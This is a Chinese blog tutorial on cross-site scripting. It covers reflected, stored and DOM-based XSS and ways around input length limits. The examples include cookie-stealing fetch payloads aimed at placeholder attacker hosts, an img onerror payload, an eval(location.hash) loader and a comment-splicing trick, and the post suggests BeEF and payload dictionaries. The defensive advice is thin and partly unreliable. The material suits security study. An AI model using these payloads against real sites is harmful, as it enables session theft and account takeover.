WEB-漏洞总结(xss详解)

已于 2022-04-07 23:52:43 修改
阅读量199 收藏
点赞数
文章标签: 安全 linux 网络
于 2022-03-24 20:22:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50643984/article/details/123719566
版权

1.xss的分类

反射型,存储型,dom型

反射型(url)

http://www.xxx.com/music?name='bob'

攻击者拼接一个恶意的script请求

http://www.xxx.com/music?name='bob'<script>alert(1)</script>

甚至可以这样

http://www.xxx.com/music?name='bob'<script>fetch(`http://恶意者的网站.com/>cookie=${document.cookie}`)</script>

1.防御其实很简单,只要过滤一下请求就可以,例如把<> ? /替换就可以了replace(/"/g, '&quot;')

2.就是对用户传参进行加密encode,然后服务端解密就可以了。

存储型(表单)

与反射型不同,存储型 XSS 攻击是指当用户的输入包含了恶意脚本,服务端未经过转义就存储到数据库,访问页面会触发恶意脚本执行,而导致的攻击。

假如在某网站上有一篇爆款文章:https://xxx.com/articles/1

攻击者在文章下面发表了一篇评论,内容中包含了 script 脚本:

文章写的真棒!<script>fetch(`http://attack.com/cookies?cookie=${document.cookie}`)</script>

如果服务端直接把评论字符串保存到数据库了,下次只要有用户访问该文章时,包含恶意脚本的评论内容被返回,把当前用户的 cookie 发送到攻击者的服务器!

可以看到,用户的 Cookie 马上被发送到了攻击者的服务器。其实这种获取 Cookie 的方式还算小打小闹了,只要能够利用 xss 注入 script,黑客真的是可以「为所欲为」,例如黑客通过操作 DOM 的方式,分分钟把你的网站变成赌博网站、色情网站…

DOM型(onerror)

DOM 型 XSS 与反射型或存储型 XSS 的区别在于,DOM 型在服务器返回的网页或脚本中是看不到恶意代码的,而是在更新 DOM 树的时候触发了恶意脚本的执行。

我们来看一则模拟案例,前端开发人员未经过滤就直接把用户输入插入到 HTML 中:

<input id="input" type="text" />
<button onclick="container.innerHTML = input.value">点击</button>
<p id="container"></p>

攻击者利用方式

<img src="x" onerror="fetch(`http://attack.com/cookies?cookie=${document.cookie}`)" />

根据img的特性,如果这个src连接不存在,就会执行这个onerror语句,此时受害者完全不知道。

开启HttpOnly下的利用

在开启httponly后不会再向第三方网站发生cookie,那么我们可以直接在本站执行

xss bypass

在这里插入图片描述

在这里插入图片描述

绕过xss的长度限制

1.攻击者可以利用事件(Event)来缩短所需的字节数:

" onclick=alert(1) //

实际输出

<input type="text" value="" onclick=alert(1) //"/>

2.但利用"事件标签"能够缩短的字节数是有限的, 最好的办法是把XSS Payload 写到别处, 再通过简短的代码加载这段XSS Payload。

最常用的一个"藏身处"就是 “location.hash”

" οnclick="eval(location.hash.substr(1))

在这里插入图片描述

"location.hash"本身并没有长度限制, 但是浏览器的地址栏是有长度限制的, 不过这个长度已经足够写很长的XSS Payload了, 要是地址栏长度也不够用, 还可以再使用加载远程JS的方法来写更多的代码。

3.某些环境下, 可以利用注释符绕过长度限制。
比如我们能够控制两个文本框, 第二个文本框允许写入更多的字符。此时利用HTML的注释符号, 把两个文本框之间的HTML代码全部注释掉, 从而"打通" 两个input标签。

原html:

<input id=1 type="text" value="$var1" />
<input id=2 type="text" value="$var2" />

在第一个input框中输入:

"> <!--

在第二个input框中输入:

--> <script>alert(1)</script>

最终的效果是:

<input id=1 type="text" value=""> 

<!-- /><input id=2 type="text" value="--> 
<script>alert(1)</script>" />

第二行就相当于注释了。

总结

其实在平时的挖洞过程中,一般xss都是盲打,用些xss的字典进行盲打,配合burp更好。
还有一些检测xss的工具,还有就是beef-强大的xss利用工具,xray自动挖洞也不错哦。

javelin266桑桑
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS字典大全.rar
04-17
收集的XSS字典,一共四本,分别为简单版本,普通版本,大字典,超大字典。适合FUZZXSS漏洞。与burp配合使用。工具仅限于测试,请不要用于非法操作,因字典导致法律问题与本人无关
WEB安全的学习总结与心得(六)——XSS漏洞
weixin_44681434的博客
05-05 1052
WEB安全的学习总结与心得(六) 01 XSS漏洞之简介 属性 属性 介绍 英文全称 Cross Site Script 中文全称 跨站脚本 缩写 XSS 危害 盗取用户信息,钓鱼,制造蠕虫 类型 存储型,反射型,DOM型 漏洞类型 客户端漏洞 名字由来 由于CSS已经被层叠样式表(Cascading Style Sheets)占用了,于是业内人士就换了一个...
[ 常见漏洞篇 ]常见web漏洞总结------XSS跨站脚本漏洞
qq_51577576的博客
12-07 3832
本文简单的总结了一下XSS的知识点 主要是从面试的角度来总结的 如果想从事安全方向,那么这些基本的漏洞都是需要掌握的 目录 一、XSS形成原因: 二、XSS分类: 1. 反射型XSS 2. 存储型XSS 3. DOM型XSS 1. 被攻击对象的不同 2. 解析位置不同 3. 存储时间不同 三、XXS防御: 1. 输入过滤 2. 输出转义 四、xxs漏洞的利用 1. 测试流程 2. 利用方式: 五、xxs的攻击流程 1. 存储型: ​2. 反射型: 五、...
WEB安全之浅谈XSS漏洞
2301_76251460的博客
03-31 240
web安全XSS漏洞
xray扫描器的使用 (长亭科技公司创造)
yyj1781572的博客
11-27 8526
xray扫描器的使用 xray是一款可以使用HTTP/HTTPS代理进行被动扫描的安全工具
JSP安全开发之XSS漏洞详解
10-21
XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意脚本代码,而程序对于用户输入内容未过滤,当用户浏览该页之时,嵌入其中Web里面的脚本代码会被执行,从而达到恶意攻击用户...
安全漏洞XSS攻击方法详解
01-26
XSS是跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web...
xss漏洞安全编码系列详解
06-10
结合在csdn上web渗透测试课程(https://edu.csdn.net/course/detail/8064该课程主要讲解攻击过程),讲解xss的攻击原理及漏洞编码,现场带领大家编写补丁代码,真正在代码层面上杜绝该类漏洞的存在。
SQL 注入和 XSS 漏洞详解
01-25
web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,希望大家多多提意见。
XSS高级实战教程
09-28
跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的...
xss_javaxss_XSS_
10-04
java防止xss注入解决Java出现的xss
xss测试语句大全--5000条
03-24
xss测试语句---5000条
brutexss一款快速验证存在xss漏洞
05-07
brutexss安全工程师快速验证页面是否存在brutexss漏洞,使用简单方便,字典强大,自带xss漏洞验证语法,一条指令就可以验证xss漏洞是否存在以及注入方式
(28)【xss工具绕过】xss之burpsuite、前端、字典……
04-04 2034
包括代码层面、工具层面的xss绕过……
XSS
nextack的专栏
04-28 451
&lt;script&gt;alert(1)&lt;/script&gt;&lt;script&gt;alert(1)&lt;/script&gt;测试
WebXSS
qq_62803993的博客
01-09 294
(1)输入在标签间的情况:测试是否被过滤或转义,若无则直接(2)输入在 script标签内:我们需要在保证内部JS语法正确的前提下,去插入我们的 payload。如果我们的输岀在字符串内部,测试字符串能否被闭合。如果我们无法闭合包裹字符串的引号,这个点就很难利用了可能的解决方案:可以控制两处输入且\可用、存在宽字节(3)输入在HTML属性內:首先査看属性是否有双引号包裏、没有则直接添加新的事件属性;
XSS简单总结
Aiwin的博客
07-11 945
XSS的简单总结
web安全XSS攻击原理及防范
lgxzzz的博客
05-27 8026
一:什么是XSS攻击? 二:反射型XSS 三:存储型XSS 四:DOM-based型XSS 五:SQL注入 六:XSS如何防范? 1. cookie安全策略 2. X-XSS-Protection设置 3. XSS防御HTML编码 4. XSS 防御HTML Attribute编码 5. XSS防御之javascript编码 6. XSS 防御之 URL 编码 7. XSS 防御之 CSS 编码 8. 开启CSP网页安全政策防止XSS攻击 回到顶部 一:什么是X
web漏洞-XSS
qq_21193587的博客
05-31 4819
XSS 漏洞介绍 XSS 攻击是指在网页中嵌入一段恶意的客户端 Js 脚本代码片段,JS 脚本恶意代码可以获取用户的 Cookie、URL 跳转、内容篡改、会话劫持……等。 漏洞危害 xss 攻击手段本身对服务端没有直接的危害,xss 主要是借助网站传播;一般通过留言板、邮件、等其他途径向受害者发送一段恶意的 URL,受害者通过访问该恶意 URL 可能会导致恶意的 xss 脚步会在受害者的客户端浏览器中执行,实现自己的目的 漏洞原理 XSS 的攻击类别分为:反射型、存储型、DOM 型等三大类攻击类别。 反射
xss-labs靶场通关详解
最新发布
08-26
通常,成功通过XSS-labs靶场的关键是了解XSS漏洞的原理和常见的防御措施。你可以通过学习相关的网络安全知识和参加相关的训练课程来提高对XSS漏洞的理解和攻防能力。同时,使用漏洞扫描工具和安全审计工具,如Burp ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值